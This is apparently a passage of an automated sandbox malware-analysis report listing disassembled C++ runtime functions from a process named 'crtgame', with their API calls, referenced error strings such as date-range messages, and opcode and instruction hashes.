                                                                                                            • Instruction Fuzzy Hash: A7F0AEB064431DE6EF04E6A889159AF73FD9F04714B4409A9E511D31C1EF71E70849D4
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 02C23C1B
                                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 02C23C30
                                                                                                              • Part of subcall function 02C31ED7: std::exception::exception.LIBCMT ref: 02C31EE1
                                                                                                              • Part of subcall function 02C29FF6: __EH_prolog.LIBCMT ref: 02C29FFB
                                                                                                              • Part of subcall function 02C29FF6: __CxxThrowException@8.LIBCMT ref: 02C2A024
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                            • String ID: bad cast
                                                                                                            • API String ID: 1300498068-3145022300
                                                                                                            • Opcode ID: 674287906aa69aec01e115546f7801025d7ec1e7045a3530eae6e2ef4305f6b4
                                                                                                            • Instruction ID: 507475297ec2e793f72894d9d883298d47faf22719cf11b9c9c87c324c4db14a
                                                                                                            • Opcode Fuzzy Hash: 674287906aa69aec01e115546f7801025d7ec1e7045a3530eae6e2ef4305f6b4
                                                                                                            • Instruction Fuzzy Hash: C3F0A7729005488BC719DF58D4406DBB776FF51315F10416EED0657240CFB29A4BDA91
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 02C238D2
                                                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02C238F1
                                                                                                              • Part of subcall function 02C21410: std::exception::exception.LIBCMT ref: 02C21428
                                                                                                            Strings
                                                                                                            • Year is out of valid range: 1400..10000, xrefs: 02C238E0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                            • String ID: Year is out of valid range: 1400..10000
                                                                                                            • API String ID: 2067857976-2344417016
                                                                                                            • Opcode ID: 22bad19704a7051cfa69d440f1f1c27a91550dd9f609b8accf4a851206f8ead7
                                                                                                            • Instruction ID: e1c23b9075211a912196b5881e788217c1017da6a71fbf9354b98d58278992e3
                                                                                                            • Opcode Fuzzy Hash: 22bad19704a7051cfa69d440f1f1c27a91550dd9f609b8accf4a851206f8ead7
                                                                                                            • Instruction Fuzzy Hash: BFE0D872E0021497DB28FB989C55BDFB779EB08710F04015EE80663280DEB12948DB91
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 02C23886
                                                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02C238A5
                                                                                                              • Part of subcall function 02C21410: std::exception::exception.LIBCMT ref: 02C21428
                                                                                                            Strings
                                                                                                            • Day of month value is out of range 1..31, xrefs: 02C23894
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                            • String ID: Day of month value is out of range 1..31
                                                                                                            • API String ID: 2067857976-1361117730
                                                                                                            • Opcode ID: 151aec502c4e8a9f20b9d99ff2d08f27368c1dddb4282dade62f0e5975f8c0e7
                                                                                                            • Instruction ID: abe9aa933d5d6fa67be85960744cd73d26aa4109f6dea472aa4bfc00c85f6b90
                                                                                                            • Opcode Fuzzy Hash: 151aec502c4e8a9f20b9d99ff2d08f27368c1dddb4282dade62f0e5975f8c0e7
                                                                                                            • Instruction Fuzzy Hash: 72E0D872E0021497D714FB989C55BDEB779EB08720F04055EE80673280DEB12948DB95
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 02C2391E
                                                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02C2393D
                                                                                                              • Part of subcall function 02C21410: std::exception::exception.LIBCMT ref: 02C21428
                                                                                                            Strings
                                                                                                            • Month number is out of range 1..12, xrefs: 02C2392C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                            • String ID: Month number is out of range 1..12
                                                                                                            • API String ID: 2067857976-4198407886
                                                                                                            • Opcode ID: 0b3caa0afa1cae24e86d46992567fb8779cb3d8f058c1e49d067392c5ba019d4
                                                                                                            • Instruction ID: 80b5627d22e17c495413899f01fa2295b563e8f60dae18cacc5be34be7e1c770
                                                                                                            • Opcode Fuzzy Hash: 0b3caa0afa1cae24e86d46992567fb8779cb3d8f058c1e49d067392c5ba019d4
                                                                                                            • Instruction Fuzzy Hash: 8EE0D872F4022497D714FB989C55BEFB779EB08710F04415EE40663680DEB12948DBD1
                                                                                                            APIs
                                                                                                            • TlsAlloc.KERNEL32 ref: 02C219CC
                                                                                                            • GetLastError.KERNEL32 ref: 02C219D9
                                                                                                              • Part of subcall function 02C21712: __EH_prolog.LIBCMT ref: 02C21717
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocErrorH_prologLast
                                                                                                            • String ID: tss
                                                                                                            • API String ID: 249634027-1638339373
                                                                                                            • Opcode ID: a3bdc56174d5463734ed38448943e511e39b0263793820ed925088bcf44a8f18
                                                                                                            • Instruction ID: 22ea1e2a8a13b4a033147e3e877eee58b618b495a54b9d1771003a04528dbf9c
                                                                                                            • Opcode Fuzzy Hash: a3bdc56174d5463734ed38448943e511e39b0263793820ed925088bcf44a8f18
                                                                                                            • Instruction Fuzzy Hash: 4CE08677D153245BC3107B78A80818BBBD49A84230F104B6AECAD832D0FF3199589FC6
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 02C23BD8
                                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 02C23BED
                                                                                                              • Part of subcall function 02C31ED7: std::exception::exception.LIBCMT ref: 02C31EE1
                                                                                                              • Part of subcall function 02C29FF6: __EH_prolog.LIBCMT ref: 02C29FFB
                                                                                                              • Part of subcall function 02C29FF6: __CxxThrowException@8.LIBCMT ref: 02C2A024
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                            • String ID: bad cast
                                                                                                            • API String ID: 1300498068-3145022300
                                                                                                            • Opcode ID: d2f6881dab9e893d7fb8a95f75d0ef120b248c435db5e5af8a3a85a4ff2c070d
                                                                                                            • Instruction ID: d808ab7f1cc8a47f31c4d5a715cef680c99af2369815212f82114afba7d9c6f4
                                                                                                            • Opcode Fuzzy Hash: d2f6881dab9e893d7fb8a95f75d0ef120b248c435db5e5af8a3a85a4ff2c070d
                                                                                                            • Instruction Fuzzy Hash: 22E09A70A001489BC718EF54D541BAEB772EF10304F1080ACA90603280CF751A0ADE81